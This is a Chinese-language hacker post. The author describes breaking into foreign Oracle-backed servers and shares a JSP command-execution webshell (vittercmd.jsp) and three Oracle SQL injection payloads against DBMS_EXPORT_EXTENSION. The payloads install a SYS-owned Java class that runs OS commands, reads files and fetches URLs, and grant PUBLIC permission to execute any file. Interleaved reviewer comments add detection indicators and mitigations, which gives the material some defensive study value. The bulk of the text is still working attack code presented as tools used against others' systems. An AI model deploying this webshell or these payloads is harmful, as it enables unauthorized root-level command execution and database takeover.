最近遇到些国外的oracle服务器,其中好多系统的内核无法local root,但是有在root权限下跑的java的web服务,有在web目录写权限,但是经常用的jshell是GBK的,在国外(先是棒子,放过了,后有小鬼子,再后来还有阿三,实在受不了了,自己改一个)的机器上基本不支持该字体,没办法自己改了一个cmd的webshell多加了一个密码认证。
------------------------------代码分割线------------------------------
<%-- Review note (defender context): this file is a command-execution webshell
     sample. The surrounding text says it was written into the web root of a
     servlet container running as root, so whatever reaches this page runs as
     root. Indicators visible in this file alone: a JSP named vittercmd.jsp (the
     form ACTION below), POST parameters named "pass" and "cmd", a session
     attribute named "loginUser", and Runtime.getRuntime().exec inside JSP
     source under the web root. The response to finding it is removal plus full
     incident response on the host, not hardening of the file. --%>
<%@ page import="java.io.*" %>
<%
//by: vitter@safechina.net
// Hard-coded shared secret. As written it only influences which input box is
// rendered (see ifLogin below); it does not gate command execution.
String PASS = "vitter";
// Both values are taken straight from the request; nothing is validated.
String cmd = request.getParameter("cmd");
String pass = request.getParameter("pass");
String output = "";
// Branch 1: a non-blank "pass" parameter is treated as a login attempt. Its
// only effect is to set or clear the "loginUser" session attribute.
if (pass != null && pass.trim().length() > 0) {
if (pass.equals(PASS)) {
output = "Success";
request.getSession().setAttribute("loginUser", "loginOk");
} else {
output = "password ERR!";
request.getSession().removeAttribute("loginUser");
}
// Branch 2: any request carrying "cmd" and no "pass" is executed. This branch
// never consults the session, so the password check above is cosmetic; log
// analysis must not assume a preceding successful "pass" request.
} else if (cmd != null) {
String s = null;
try {
// Spawns a child process of the application-server JVM; where the server runs
// as root (per the surrounding text) the child inherits that. Process-tree
// monitoring (JVM spawning shells/utilities) is a reliable detection for this
// class of file.
Process p = Runtime.getRuntime().exec(cmd);
// Only stdout is read; stderr is never consumed and the process is not waited
// for. Output lines are concatenated with no separator.
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while ((s = sI.readLine()) != null) {
output += s;
}
}
catch (IOException e) {
// Written to the container's stdout/stderr log, so a failed exec (e.g. an
// unknown program name) leaves a Java stack trace in the server log — a useful
// artifact when reconstructing attacker activity.
e.printStackTrace();
}
}
// Rendering-only check: decides which input field the form shows, nothing else.
boolean ifLogin = false;
Object loingUser = request.getSession().getAttribute("loginUser");
if (loingUser != null) {
ifLogin = true;
}
%>
<%-- The fixed target filename is itself a file-system indicator. --%>
<FORM METHOD=POST ACTION='vittercmd.jsp'>
<%
if (!ifLogin) {
%>
Password:<INPUT name='pass' type=password>
<%
} else {
%>
CMD:<INPUT name='cmd' type=TEXT>
<%
}
%>
<INPUT type=submit value='Run'>
</FORM>
<hr>
<pre>
<%-- Command output is echoed unescaped into the page. --%>
<%=output %>
</pre>
附:oracle提权的小技巧
-- Review note (defender context): the third argument smuggles a PL/SQL fragment
-- into a SYS-owned package, so the nested EXECUTE IMMEDIATE runs with SYS
-- privileges (PRAGMA AUTONOMOUS_TRANSACTION lets it commit on its own). The
-- payload creates a SYS-owned Java source named "LinxUtil" whose runCMD calls
-- Runtime.exec on the database host and whose readFile reads local files.
-- This injection in DBMS_EXPORT_EXTENSION was closed by an Oracle Critical
-- Patch Update years ago; confirm the patch level of any instance you run.
-- Detection: audit/alert on calls to DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES
-- and check DBA_OBJECTS / DBA_SOURCE for a JAVA SOURCE object named LinxUtil
-- (owner SYS). Mitigation: patch, and review PUBLIC execute grants on SYS
-- packages.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual ;
-- Review note (defender context): same SYS-level injection through
-- DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES, installing a SYS-owned Java
-- source "LinxUtil". This variant's readFile also opens java.net.URL when the
-- argument starts with "http", i.e. the database host makes outbound HTTP
-- requests. Unexpected egress from a database server is therefore an extra
-- network-level indicator for this payload, alongside the LinxUtil object in
-- DBA_OBJECTS / DBA_SOURCE. Mitigation: apply the Critical Patch Update that
-- fixed this package and restrict egress from database hosts.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*;import java.net.URL; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(filename.startsWith("http")?new InputStreamReader(new URL(filename).openStream()):new FileReader(filename));
String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual ;
-- Review note (defender context): through the same injection this grants
-- PUBLIC the Java permission java.io.FilePermission "<<ALL FILES>>" execute,
-- so every database account may run OS programs via the Java procedures
-- installed above. Detection: query DBA_JAVA_POLICY for grantee PUBLIC with
-- type_name java.io.FilePermission and name <<ALL FILES>>; a grant like this
-- should never exist in a production instance. Mitigation: revoke it
-- (DBMS_JAVA.REVOKE_PERMISSION), drop the LinxUtil source, patch the package,
-- and treat the database host as compromised, since runCMD runs as the Oracle
-- OS user.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual ;